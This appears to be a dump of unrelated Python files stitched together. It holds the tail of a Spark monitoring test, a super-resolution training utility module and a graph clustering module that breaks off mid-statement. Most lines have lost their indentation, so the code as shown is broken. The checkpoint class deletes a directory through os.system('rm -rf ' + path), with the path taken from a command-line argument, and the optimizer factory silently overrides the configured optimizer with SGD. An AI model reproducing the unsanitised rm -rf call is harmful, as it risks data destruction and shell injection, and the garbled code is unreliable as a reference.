SPARK_STAGE_RUNNING_METRIC_VALUES,
SPARK_EXECUTOR_METRIC_VALUES,
SPARK_JOB_RUNNING_METRIC_VALUES,
SPARK_JOB_SUCCEEDED_METRIC_VALUES,
)
# Extract all keys
expected_metrics = set(k for j in all_metric_values for k in j)
optional_metrics = set(k for j in optional_metric_values for k in j)
# Check the running job metrics
for metric in expected_metrics:
aggregator.assert_metric(metric)
for metric in optional_metrics:
aggregator.assert_metric(metric, at_least=0)
aggregator.assert_service_check(
'spark.driver.can_connect',
status=SparkCheck.OK,
tags=['url:{}'.format('http://spark-app-2:4050')] + SPARK_DRIVER_CLUSTER_TAGS,
)
aggregator.assert_all_metrics_covered()
|
utility.py
|
import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
self.t0 = time.time()
def toc(self, restart=False):
diff = time.time() - self.t0
if restart: self.t0 = time.time()
return diff
def hold(self):
self.acc += self.toc()
def release(self):
ret = self.acc
self.acc = 0
return ret
def reset(self):
self.acc = 0
class checkpoint():
def __init__(self, args):
self.args = args
self.model_save_path = ''
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join('..', 'experiment/', args.save)
else:
self.dir = os.path.join('..', 'experiment/', args.load)
if os.path.exists(self.dir):
self.log = torch.load(self.get_path('psnr_log.pt'))
print('Continue from epoch {}...'.format(len(self.log)))
else:
args.load = ''
if args.reset:
os.system('rm -rf ' + self.dir)
args.load = ''
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path('model/'), exist_ok=True)
for d in args.data_test:
os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
open_type = 'a' if os.path.exists(self.get_path('log.txt')) else 'w'
self.log_file = open(self.get_path('log.txt'), open_type)
with open(self.get_path('config.txt'), open_type) as f:
f.write(now + '\n\n')
for arg in vars(args):
f.write('{}: {}\n'.format(arg, getattr(args, arg)))
f.write('\n')
self.n_processes = 8
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path('model/'), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + '\n')
if refresh:
self.log_file.close()
self.log_file = open(self.get_path('log.txt'), 'a')
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
for idx_data, d in enumerate(self.args.data_test):
label = 'SR on {}'.format(d)
fig = plt.figure()
plt.title(label)
for idx_scale, scale in enumerate(self.args.scale):
plt.plot(
axis,
self.log[:, idx_data, idx_scale].numpy(),
label='Scale {}'.format(scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('PSNR')
plt.grid(True)
plt.savefig(self.get_path('test_{}.pdf'.format(d)))
plt.close(fig)
def begin_background(self):
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None: break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,)) \
for _ in range(self.n_processes)
]
for p in self.process: p.start()
def end_background(self):
for _ in range(self.n_processes): self.queue.put((None, None))
while not self.queue.empty(): time.sleep(1)
for p in self.process: p.join()
def save_results(self, dataset, filename, save_list, scale):
if self.args.save_results:
filename = self.get_path(
'results-{}'.format(dataset.dataset.name),
'{}_x{}_'.format(filename, scale)
)
postfix = ('SR', 'LR', 'HR')
for v, p in zip(save_list, postfix):
normalized = v[0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
self.queue.put(('{}{}.png'.format(filename, p), tensor_cpu))
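# Hedged usage sketch (illustrative, not part of the original trainer code): the
# background-writer methods above are meant to be called in this order during
# testing so that PNG encoding happens on the worker processes; the loader and
# model names below are assumptions:
#
#   ckp.begin_background()
#   for lr, hr, filename in loader_test:
#       sr = model(lr)
#       ckp.save_results(loader_test, filename, [sr, lr, hr], scale)
#   ckp.end_background()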
def quantize(img, rgb_range):
pixel_range = 255 / rgb_range
return img.mul(pixel_range).clamp(0, 255).round().div(pixel_range)
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
if hr.nelement() == 1: return 0
diff = (sr - hr) / rgb_range
if dataset and dataset.dataset.benchmark:
shave = scale
if diff.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
diff = diff.mul(convert).sum(dim=1)
else:
shave = scale + 6
valid = diff[..., shave:-shave, shave:-shave]
mse = valid.pow(2).mean()
return -10 * math.log10(mse)
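# Minimal sanity-check sketch for quantize/calc_psnr (not part of the original
# module; the tensor shapes and rgb_range=255 are illustrative assumptions).
# With dataset=None the border shave is scale + 6 pixels per side.
def _psnr_example(scale=2, rgb_range=255):
    hr = torch.rand(1, 3, 64, 64) * rgb_range      # fake ground-truth image
    sr = quantize(hr + 1.0, rgb_range)             # "prediction" off by ~1 level
    return calc_psnr(sr, hr, scale, rgb_range)     # roughly 48 dB for this setup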
def make_optimizer(args, target):
'''
make optimizer and scheduler together
'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
args.optimizer = 'SGD'  # TODO: hard-coded override of the configured optimizer; modify this later
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
milestones = list(map(lambda x: int(x), args.decay.split('-')))
kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
scheduler_class = lrs.MultiStepLR
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir)))
if epoch > 1:
for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self):
self.scheduler.step()
def get_lr(self):
return self.scheduler.get_lr()[0]
def get_last_epoch(self):
return self.scheduler.last_epoch
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
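# Hedged usage sketch (not part of the original file): make_optimizer expects an
# argparse-style namespace; the attribute names below mirror the ones read above
# (lr, weight_decay, momentum, decay, gamma, ...), but the values are
# illustrative assumptions rather than the project's defaults.
if __name__ == '__main__':
    from types import SimpleNamespace
    _demo_args = SimpleNamespace(
        lr=1e-4, weight_decay=0, momentum=0.9, betas=(0.9, 0.999),
        epsilon=1e-8, optimizer='SGD', decay='200-400', gamma=0.5,
    )
    _demo_model = torch.nn.Linear(4, 4)
    _demo_optimizer = make_optimizer(_demo_args, _demo_model)
    _demo_optimizer.schedule()                  # steps the attached MultiStepLR
    print('demo lr after one step:', _demo_optimizer.get_lr())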
|
find_clusters.py
|
import scipy as sp
import numpy as np
import time
import random
import queue
import multiprocessing as mp
import copy
from collections import defaultdict
from sklearn.cluster import AgglomerativeClustering
from sklearn.metrics import pairwise_distances
from joblib import Parallel, delayed
from .approximate_pagerank import approximate_pagerank
from .approximate_pagerank_weighted import approximate_PageRank_weighted
from .spectral_clustering import spectral_clustering
from .flow_clustering import flow_clustering
from .GraphLocal import GraphLocal
from .cpp import *
def compute_embedding(g,
node,
rho_list,
alpha_list,
nsamples_from_rho,
nsamples_from_alpha,
localmethod,
normalize,
normalized_objective,
epsilon,
iterations,
cpp):
ref_node = [node]
sampled_rhos = list(np.geomspace(rho_list[0], rho_list[1], nsamples_from_rho, endpoint=True))
sampled_alphas = list(np.geomspace(alpha_list[0], alpha_list[1], nsamples_from_alpha, endpoint=True))
min_crit = 10000
min_crit_embedding = 0
for alpha in list(reversed(sampled_alphas)):
for rho in list(reversed(sampled_rhos)):
output = approximate_pagerank(g, ref_node, iterations=iterations, alpha=alpha, rho=rho, epsilon=epsilon,
cpp=cpp, normalize=normalize, normalized_objective=normalized_objective,
method=localmethod)
conductance = g.compute_conductance(output[0])
crit = conductance
if crit <= min_crit:
min_crit = crit
min_crit_embedding = output
return min_crit_embedding
def compute_embedding_and_improve(g,
node,
rho_list,
alpha_list,
nsamples_from_rho,
nsamples_from_alpha,
localmethod,
normalize,
normalized_objective,
epsilon,
iterations,
cpp):
ref_node = [node]
sampled_rhos = list(np.geomspace(rho_list[0], rho_list[1], nsamples_from_rho, endpoint=True))
sampled_alphas = list(np.geomspace(alpha_list[0], alpha_list[1], nsamples_from_alpha, endpoint=True))
min_crit = 10000
min_crit_embedding = 0
for alpha in list(reversed(sampled_alphas)):
for rho in list(reversed(sampled_rhos)):
output = approximate_pagerank(g, ref_node, iterations=iterations, alpha=alpha, rho=rho, epsilon=epsilon,
cpp=cpp, normalize=normalize, normalized_objective=normalized_objective,
method=localmethod)
conductance = g.compute_conductance(output[0])
crit = conductance
if crit <= min_crit:
min_crit = crit
min_crit_embedding = output
output_mqi = flow_clustering(g,min_crit_embedding[0],method="mqi_weighted")
return output_mqi
def find_clusters(g,
nclusters,
rho_list,
alpha_list,
localmethod: str = 'l1reg-rand',
normalize: bool = False,
normalized_objective: bool = False,
cpp: bool = True,
epsilon: float = 1.0e-2,
iterations: int = 10000000,
nsamples_from_rho: int = 50,
nsamples_from_alpha: int = 50,
linkage: str = 'average',
norm_type: int = 2,
njobs: int = 1,
prefer: str = 'threads',
backend: str = 'multiprocessing',
metric: str ='euclidean'):
"""
Find clusters in a graph using local graph clustering.
--------------------------------
This method runs local graph clustering for each node in the graph in parallel,
aggregates the embeddings into a pairwise distance matrix, and then uses
agglomerative clustering to find the clusters.
Parameters
----------
g: GraphLocal
nclusters: int
Number of clusters to be returned
rho_list: 2D list of floats
This is an interval of rhos, the regularization parameter for l1-regularized PageRank.
The first element should be smaller than the second element of the list.
alpha_list: 2D list of floats
This is an interval of alphas, the teleportation parameter for l1-regularized PageRank.
The first element should be smaller than the second element of the list.
The smaller alpha is, the more global the personalized PageRank vector is.
Parameters (optional)
---------------------
nsamples_from_rho: int
Number of samples of rho parameters to be selected from interval rho_list.
nsamples_from_alpha: int
Number of samples of alpha parameters to be selected from interval alpha_list.
localmethod: string
Default = 'l1reg-rand'
Which method to use.
Options: 'l1reg', 'l1reg-rand'.
iterations: int
Default = 10000000
Maximum number of iterations of the ACL algorithm.
epsilon: float
Default = 1.0e-2
Tolerance for localmethod.
normalize: bool
Default = False
Normalize the output so it can be fed directly into sweepcut routines.
normalized_objective: bool
Default = False
Use the normalized Laplacian in the objective function; works only for "method=l1reg" and "cpp=True".
cpp: bool
Default = True
If true calls the cpp code for approximate pagerank, otherwise, it calls the python code.
linkage: str
Default = 'average'
Which linkage criterion to use for agglomerative clustering.
For other options check:
https://scikit-learn.org/stable/modules/generated/sklearn.cluster.AgglomerativeClustering.html
metric: str
Default = 'euclidean'
Metric for measuring distances among nodes.
For details check:
https://scikit-learn.org/stable/modules/generated/sklearn.metrics.pairwise_distances.html
norm_type: int
Default = 2
Norm for normalization of the embeddings.
njobs: int
Default = 1
Number of jobs to be run in parallel
prefer, backend: str
Check documentation of https://joblib.readthedocs.io/en/latest/
Returns
-------
labels: np.ndarray
An np.ndarray of the cluster allocation of each node.
For example labels[i] is the cluster of node i.
"""
n = g._num_vertices
# is_weighted = g.weighted
if njobs > 1:
results = Parallel(n_jobs=njobs, prefer=prefer, backend=backend)(delayed(compute_embedding)(g,node,rho_list,alpha_list,nsamples_from_rho,nsamples_from_alpha,localmethod,normalize,normalized_objective,epsilon,iterations,cpp) for node in range(n))
else:
results = [compute_embedding(g,node,rho_list,alpha_list,nsamples_from_rho,nsamples_from_alpha,localmethod,normalize,normalized_objective,epsilon,iterations,cpp) for node in range(n)]
sum_ = 0
JA = [0]
IA = []
A = []
for data in results:
vec = data[1]/np.linalg.norm(data[1],norm_type)
how_many = len(data[0])
sum_ += how_many
JA.append(sum_)
IA.extend(list(data[0]))
A.extend(list(vec))
X = sp.sparse.csc_matrix((A, IA, JA), shape=(n, n))
X = X.transpose()
Z = pairwise_distances(X, metric=metric, n_jobs=njobs)
clustering = AgglomerativeClustering(n_clusters=nclusters,affinity="precomputed",linkage=linkage).fit(Z)
labels = clustering.labels_
return labels
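# Hedged usage sketch for find_clusters (the graph file and parameter values are
# illustrative assumptions, not defaults of this package):
#
#   g = GraphLocal('datasets/my_graph.edgelist', 'edgelist', ' ')
#   labels = find_clusters(g, nclusters=10,
#                          rho_list=[1e-4, 1e-2], alpha_list=[0.05, 0.25],
#                          nsamples_from_rho=5, nsamples_from_alpha=5, njobs=4)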
def compute_all_embeddings(g,
rho_list,
alpha_list,
localmethod: str = 'l1reg-rand',
normalize: bool = False,
normalized_objective: bool = False,
cpp: bool = True,
epsilon: float = 1.0e-2,
iterations: int = 10000000,
nsamples_from_rho: int = 50,
nsamples_from_alpha: int = 50,
njobs: int = 1,
prefer: str = 'threads',
backend: str = 'multiprocessing'):
"""
This method runs local graph clustering for each node in the graph in parallel.
Returns the embeddings for each node in a list. Each element of the list corresponds to an embedding
of a node.
Parameters
----------
g: GraphLocal
rho_list: 2D list of floats
This is an interval of rhos, the regularization parameter for l1-regularized PageRank.
The first element should be smaller than the second element of the list.
alpha_list: 2D list of floats
This is an interval of alphas, the teleportation parameter for l1-regularized PageRank.
The first element should be smaller than the second element of the list.
The smaller alpha is, the more global the personalized PageRank vector is.
Parameters (optional)
---------------------
nsamples_from_rho: int
Number of samples of rho parameters to be selected from interval rho_list.
nsamples_from_alpha: int
Number of samples of alpha parameters to be selected from interval alpha_list.
localmethod: string
Default = 'l1reg-rand'
Which method to use.
Options: 'l1reg', 'l1reg-rand'.
iterations: int
Default = 10000000
Maximum number of iterations of the ACL algorithm.
epsilon: float
Default = 1.0e-2
Tolerance for localmethod.
normalize: bool
Default = False
Normalize the output so it can be fed directly into sweepcut routines.
normalized_objective: bool
Default = False
Use the normalized Laplacian in the objective function; works only for "method=l1reg" and "cpp=True".
cpp: bool
Default = True
If true calls the cpp code for approximate pagerank, otherwise, it calls the python code.
njobs: int
Default = 1
Number of jobs to be run in parallel
prefer, backend: str
Check documentation of https://joblib.readthedocs.io/en/latest/
Returns
-------
embeddings: list of arrays
Each element corresponds to an embedding of a node.
"""
n = g._num_vertices
# is_weighted = g.weighted
if njobs > 1:
embeddings = Parallel(n_jobs=njobs, prefer=prefer, backend=backend)(delayed(compute_embedding)(g,node,rho_list,alpha_list,nsamples_from_rho,nsamples_from_alpha,localmethod,normalize,normalized_objective,epsilon,iterations,cpp) for node in range(n))
else:
embeddings =[compute_embedding(g,node,rho_list,alpha_list,nsamples_from_rho,nsamples_from_alpha,localmethod,normalize,normalized_objective,epsilon,iterations,cpp) for node in range(n)]
return embeddings
def normalize_embeddings(g, embeddings,
norm_type: int = 2):
"""
Normalize the embeddings.
Parameters
----------
g: GraphLocal
embeddings: list of arrays
Each element corresponds to an embedding of a node.
Parameters (optional)
---------------------
norm_type: int
Default = 2
Norm for normalization of the embeddings.
Returns
-------
X: csc matrix
The embeddings matrix. Each row corresponds to an embedding of a node.
"""
n = g._num_vertices
sum_ = 0
JA = [0]
IA = []
A = []
for data in embeddings:
vec = data[1]/np.linalg.norm(data[1],norm_type)
how_many = len(data[0])
sum_ += how_many
JA.append(sum_)
IA.extend(list(data[0]))
A.extend(list(vec))
X = sp.sparse.csc_matrix((A, IA, JA), shape=(n, n))
X = X.transpose().tocsr()
# Z = pairwise_distances(X, metric=metric, n_jobs=njobs)
return X
def compute_clusters_given_distance(nclusters,Z,linkage: str = 'average'):
"""
Find clusters in a graph using local graph clustering.
--------------------------------
Each node is represented by a sparse local graph clustering vector.
Then it uses agglomerative clustering to find the clusters.
Parameters
----------
nclusters: int
Number of clusters to be returned
Z: 2D np.ndarray
The pairwise distance matrix Z. For example, component Z[i,j]
is the distance between nodes i and j.
Parameters (optional)
---------------------
linkage: str
Default = 'average'
Which linkage criterion to use for agglomerative clustering.
For other options check:
https://scikit-learn.org/stable/modules/generated/sklearn.cluster.AgglomerativeClustering.html
Returns
-------
labels: np.ndarray
An np.ndarray of the cluster allocation of each node.
For example labels[i] is the cluster of node i.
"""
clustering = AgglomerativeClustering(n_clusters=nclusters,affinity="precomputed",linkage=linkage).fit(Z)
labels = clustering.labels_
return labels
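# The three helpers above decompose the find_clusters pipeline so the expensive
# embedding step can be reused. A hedged sketch of the intended call order
# (parameter values are illustrative):
#
#   embeddings = compute_all_embeddings(g, [1e-4, 1e-2], [0.05, 0.25], njobs=4)
#   X = normalize_embeddings(g, embeddings)
#   Z = pairwise_distances(X, metric='euclidean', n_jobs=4)
#   labels = compute_clusters_given_distance(10, Z)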
def graph_segmentation(g,
rho_list,
alpha_list,
localmethod: str = 'l1reg-rand',
normalize: bool = False,
normalized_objective: bool = False,
cpp: bool = True,
epsilon: float = 1.0e-2,
iterations: int = 10000000,
nsamples_from_rho: int = 50,
nsamples_from_alpha: int = 50,
njobs = 1,
prefer: str = 'threads',
backend: str = 'multiprocessing',
how_many_in_parallel = 5,
ratio = 0.01):
"""
Segment the graph into pieces by peeling off clusters in parallel using local graph clustering.
--------------------------------
Parameters
----------
g: GraphLocal
rho_list: 2D list of floats
This is an interval of rhos, the regularization parameter for l1-regularized PageRank.
The first element should be smaller than the second element of the list.
alpha_list: 2D list of floats
This is an interval of alphas, the teleportation parameter for l1-regularized PageRank.
The first element should be smaller than the second element of the list.
The smaller alpha is, the more global the personalized PageRank vector is.
Parameters (optional)
---------------------
nsamples_from_rho: int
Number of samples of rho parameters to be selected from interval rho_list.
nsamples_from_alpha: int
Number of samples of alpha parameters to be selected from interval alpha_list.
localmethod: string
Default = 'l1reg-rand'
Which method to use.
Options: 'l1reg', 'l1reg-rand'.
iterations: int
Default = 10000000
Maximum number of iterations of the ACL algorithm.
epsilon: float
Default = 1.0e-2
Tolerance for localmethod.
normalize: bool
Default = False
Normalize the output so it can be fed directly into sweepcut routines.
normalized_objective: bool
Default = False
Use the normalized Laplacian in the objective function; works only for "method=l1reg" and "cpp=True".
cpp: bool
Default = True
If true calls the cpp code for approximate pagerank, otherwise, it calls the python code.
njobs: int
Default = 1
Number of jobs to be run in parallel
prefer, backend: str
Check documentation of https://joblib.readthedocs.io/en/latest/
how_many_in_parallel: int
Default = 5
Number of segments that are computed in parallel per round.
There is a trade-off here: larger values finish faster, but segments found in
the same round come from the same residual graph and may overlap.
ratio: float
Default = 0.01
Let n be the number of nodes; this segmentation code will ignore the last
ratio*n nodes and cluster them as one cluster.
Returns
-------
info: list of lists
Each element of the list is another list with two elements.
The first element is the indices of a segment, while the second element
is the vector representation of that segment.
labels: np.ndarray
An np.ndarray of the cluster allocation of each node.
For example labels[i] is the cluster of node i.
"""
g_copy = GraphLocal.from_sparse_adjacency(g.adjacency_matrix)
candidates = list(range(g_copy._num_vertices))
labels = np.zeros(g_copy._num_vertices,dtype=np.int32)
info = []
ct = 0
while True:
if njobs > 1:
select_from = list(range(g_copy._num_vertices))
ref_nodes = random.sample(select_from, min(how_many_in_parallel,len(select_from)))
results = Parallel(n_jobs=njobs, prefer=prefer, backend=backend)(delayed(compute_embedding)(g_copy,node,rho_list,alpha_list,nsamples_from_rho,nsamples_from_alpha,localmethod,normalize,normalized_objective,epsilon,iterations,cpp) for node in ref_nodes)
else:
select_from = list(range(g_copy._num_vertices))
ref_nodes = random.sample(select_from, njobs)
results =[compute_embedding(g_copy,node,rho_list,alpha_list,nsamples_from_rho,nsamples_from_alpha,localmethod,normalize,normalized_objective,epsilon,iterations,cpp) for node in ref_nodes]
union_sets_to_remove = set()
for res in results:
idx = [candidates[i] for i in res[0]]
labels[idx] = ct
ct += 1
union_sets_to_remove.update(res[0])
info.append([idx,res[1]])
for index in sorted(list(union_sets_to_remove), reverse=True):
del candidates[index]
indices = list(set(range(g_copy._num_vertices)) - set(union_sets_to_remove))
A = g_copy.adjacency_matrix.tocsr()[indices, :].tocsc()[:, indices]
g_copy = GraphLocal.from_sparse_adjacency(A)
print ("Percentage completed: ", 100-len(candidates)/g._num_vertices*100, end="\r")
if len(candidates) <= g._num_vertices*ratio:
for i in candidates:
labels[i] = ct
ct += 1
return labels, info
def graph_segmentation_with_improve(g,
rho_list,
alpha_list,
localmethod: str = 'l1reg-rand',
normalize: bool = False,
normalized_objective: bool = False,
cpp: bool = True,
epsilon: float = 1.0e-2,
iterations: int = 10000000,
nsamples_from_rho: int = 50,
nsamples_from_alpha: int = 50,
njobs = 1,
prefer: str = 'threads',
backend: str = 'multiprocessing',
how_many_in_parallel = 5,
ratio = 0.01):
"""
Segment the graph into pieces by peeling off clusters in parallel using local graph clustering.
--------------------------------
Parameters
----------
g: GraphLocal
rho_list: 2D list of floats
This is an interval of rhos, the regularization parameter for l1-regularized PageRank.
The first element should be smaller than the second element of the list.
alpha_list: 2D list of floats
This is an interval of alphas, the teleportation parameter for l1-regularized PageRank.
The first element should be smaller than the second element of the list.
The smaller alpha is, the more global the personalized PageRank vector is.
Parameters (optional)
---------------------
nsamples_from_rho: int
Number of samples of rho parameters to be selected from interval rho_list.
nsamples_from_alpha: int
Number of samples of alpha parameters to be selected from interval alpha_list.
localmethod: string
Default = 'l1reg-rand'
Which method to use.
Options: 'l1reg', 'l1reg-rand'.
iterations: int
Default = 10000000
Maximum number of iterations of the ACL algorithm.
epsilon: float
Default = 1.0e-2
Tolerance for localmethod.
normalize: bool
Default = False
Normalize the output so it can be fed directly into sweepcut routines.
normalized_objective: bool
Default = False
Use the normalized Laplacian in the objective function; works only for "method=l1reg" and "cpp=True".
cpp: bool
Default = True
If true calls the cpp code for approximate pagerank, otherwise, it calls the python code.
njobs: int
Default = 1
Number of jobs to be run in parallel
prefer, backend: str
Check documentation of https://joblib.readthedocs.io/en/latest/
how_many_in_parallel: int
Default = 5
Number of segments that are computed in parallel per round.
There is a trade-off here: larger values finish faster, but segments found in
the same round come from the same residual graph and may overlap.
ratio: float
Default = 0.01
Let n be the number of nodes; this segmentation code will ignore the last
ratio*n nodes and cluster them as one cluster.
Returns
-------
info: list of lists
Each element of the list is another list with two elements.
The first element is the indices of a segment, while the second element
is the vector representation of that segment.
labels: np.ndarray
An np.ndarray of the cluster allocation of each node.
For example labels[i] is the cluster of node i.
"""
g_copy = GraphLocal.from_sparse_adjacency(g.adjacency_matrix)
candidates = list(range(g_copy._num_vertices))
labels = np.zeros(g_copy._num_vertices,dtype=np.int32)
info = []
ct = 0
while True:
if njobs > 1:
select_from = list(range(g_copy._num_vertices))
ref_nodes = random.sample(select_from, min(how_many_in_parallel,len(select_from)))
results = Parallel(n_jobs=njobs, prefer=prefer, backend=backend)(delayed(compute_embedding_and_improve)(g_copy,node,rho_list,alpha_list,nsamples_from_rho,nsamples_from_alpha,localmethod,normalize,normalized_objective,epsilon,iterations,cpp) for node in ref_nodes)
else:
select_from = list(range(g_copy._num_vertices))
ref_nodes = random.sample(select_from, njobs)
results =[compute_embedding_and_improve(g_copy,node,rho_list,alpha_list,nsamples_from_rho,nsamples_from_alpha,localmethod,normalize,normalized_objective,epsilon,iterations,cpp) for node in ref_nodes]
union_sets_to_remove = set()
for res in results:
idx = [candidates[i] for i in res[0]]
labels[idx] = ct
ct += 1
union_sets_to_remove.update(res[0])
info.append([idx,res[1]])
for index in sorted(list(union_sets_to_remove), reverse=True):
del candidates[index]
indices = list(set(range(g_copy._num_vertices)) - set(union_sets_to_remove))
A = g_copy.adjacency_matrix.tocsr()[indices, :].tocsc()[:, indices]
g_copy = GraphLocal.from_sparse_adjacency(A)
print ("Percentage completed: ", 100-len(candidates)/g._num_vertices*100, end="\r")
if len(candidates) <= g._num_vertices*ratio:
for i in candidates:
labels[i] = ct
ct += 1
return labels, info
def compute_embeddings_and_distances_from_region_adjacency(g,info, metric='euclidean', norm_type = 2, n_jobs=1):
"""
This method assembles the local graph clustering embedding of each segment,
i.e. each node of the region adjacency graph, into a matrix X. Each row
corresponds to the embedding of a node in the region adjacency graph. It also
returns the pairwise distance matrix Z.
For example, component Z[i,j] is the distance between nodes i and j.
Parameters
----------
g: GraphLocal
info: list of lists
Each element of the list is another list with two elements.
The first element is the indices of a segment, while the second element
is the vector representation of that segment.
Parameters (optional)
---------------------
metric: str
Default = 'euclidean'
Metric for measuring distances among nodes.
For details check:
https://scikit-learn.org/stable/modules/generated/sklearn.metrics.pairwise_distances.html
norm_type: int
Default = 2
Norm for normalization of the embeddings.
n_jobs: int
Default = 1
Number of jobs to be run in parallel
Returns
-------
X: csc matrix
The embeddings matrix. Each row corresponds to an embedding of a node in the region adjacency graph.
Z: 2D np.ndarray
The pairwise distance matrix Z. For example, component Z[i,j]
is the distance between nodes i and j.
"""
sum_ = 0
JA = [0]
IA = []
A = []
for data in info:
vec = data[1]/np.linalg.norm(data[1],norm_type)
how_many = len(data[0])
sum_ += how_many
JA.append(sum_)
IA.extend(list(data[0]))
A.extend(list(vec))
X = sp.sparse.csc_matrix((A, IA, JA), shape=(g._num_vertices, len(info)))
X = X.transpose()
Z = pairwise_distances(X, metric=metric, n_jobs=n_jobs)
return X, Z
def compute_clusters_from_region_adjacency(g,nclusters,Z,info,linkage: str = 'complete'):
"""
Find clusters in a graph using a region adjacency graph.
--------------------------------
Each node represents a segment in the original graph.
Each segment is represented by a sparse local graph clustering vector.
Then it uses agglomerative clustering to find the clusters.
Parameters
----------
g: GraphLocal
nclusters: int
Number of clusters to be returned
Z: 2D np.ndarray
The pairwise distance matrix Z. For example, component Z[i,j]
is the distance between nodes i and j.
info: list of lists
Each element of the list is another list with two elements.
The first element is the indices of a segment, while the second element
is the vector representation of that segment.
Parameters (optional)
---------------------
linkage: str
Default = 'complete'
Which linkage criterion to use for agglomerative clustering.
For other options check:
https://scikit-learn.org/stable/modules/generated/sklearn.cluster.AgglomerativeClustering.html
Returns
-------
labels: np.ndarray
An np.ndarray of the cluster allocation of each node.
For example labels[i] is the cluster of node i.
"""
clustering = AgglomerativeClustering(n_clusters=nclusters,affinity="precomputed",linkage=linkage).fit(Z)
labels = clustering.labels_
expanded_labels = np.zeros(g._num_vertices, dtype=int)
for i in range(len(labels)):
for j in info[i][0]:
expanded_labels[j] = labels[i]
return expanded_labels
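# Hedged end-to-end sketch of the segmentation pipeline above (parameter values
# are illustrative assumptions):
#
#   seg_labels, info = graph_segmentation(g, [1e-4, 1e-2], [0.05, 0.25], njobs=4)
#   X, Z = compute_embeddings_and_distances_from_region_adjacency(g, info)
#   labels = compute_clusters_from_region_adjacency(g, 10, Z, info)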
def semisupervised_learning_with_improve(g,truth,kwargs_list,nprocs=1):
input_size_all = []
l1reg_PR_all = []
l1reg_RC_all = []
l1reg_F1_all = []
mqi_PR_all = []
mqi_RC_all = []
mqi_F1_all = []
flow_PR_all = []
flow_RC_all = []
flow_F1_all = []
def wrapper(q_in,q_out):
while True:
kwargs = q_in.get()
if kwargs is None:
break
delta = kwargs["delta"]
del kwargs["delta"]
ntrials = 0
input_size_curr = []
l1reg_PR_curr = []
l1reg_RC_curr = []
l1reg_F1_curr = []
mqi_PR_curr = []
mqi_RC_curr = []
mqi_F1_curr = []
flow_PR_curr = []
flow_RC_curr = []
flow_F1_curr = []
while ntrials < 20:
seed_node = np.random.choice(truth)
l1reg_output = spectral_clustering(g,[seed_node],**kwargs)[0]
if len(l1reg_output) == 0:
continue
input_size_curr.append(len(l1reg_output))
if g.weighted:
mqi_output = flow_clustering(g,l1reg_output,method="mqi_weighted")[0]
flow_output = flow_clustering(g,l1reg_output,method="flow_weighted",delta=delta)[0]
else:
mqi_output = flow_clustering(g,l1reg_output,method="mqi")[0]
flow_output = flow_clustering(g,l1reg_output,method="flow",delta=delta)[0]
l1reg_PR = len(set(truth).intersection(l1reg_output))/(1.0*len(l1reg_output))
l1reg_RC = len(set(truth).intersection(l1reg_output))/(1.0*len(truth))
l1reg_PR_curr.append(l1reg_PR)
l1reg_RC_curr.append(l1reg_RC)
l1reg_F1_curr.append(2*(l1reg_PR*l1reg_RC)/(l1reg_PR+l1reg_RC) if (l1reg_PR+l1reg_RC) > 0 else 0)
mqi_PR = len(set(truth).intersection(mqi_output))/(1.0*len(mqi_output))
mqi_RC = len(set(truth).intersection(mqi_output))/(1.0*len(truth))
mqi_PR_curr.append(mqi_PR)
mqi_RC_curr.append(mqi_RC)
mqi_F1_curr.append(2*(mqi_PR*mqi_RC)/(mqi_PR+mqi_RC) if (mqi_PR+mqi_RC) > 0 else 0)
flow_PR = len(set(truth).intersection(flow_output))/(1.0*len(flow_output))
flow_RC = len(set(truth).intersection(flow_output))/(1.0*len(truth))
flow_PR_curr.append(flow_PR)
flow_RC_curr.append(flow_RC)
flow_F1_curr.append(2*(flow_PR*flow_RC)/(flow_PR+flow_RC) if (flow_PR+flow_RC) > 0 else 0)
ntrials += 1
q_out.put((np.mean(input_size_curr),np.std(input_size_curr),
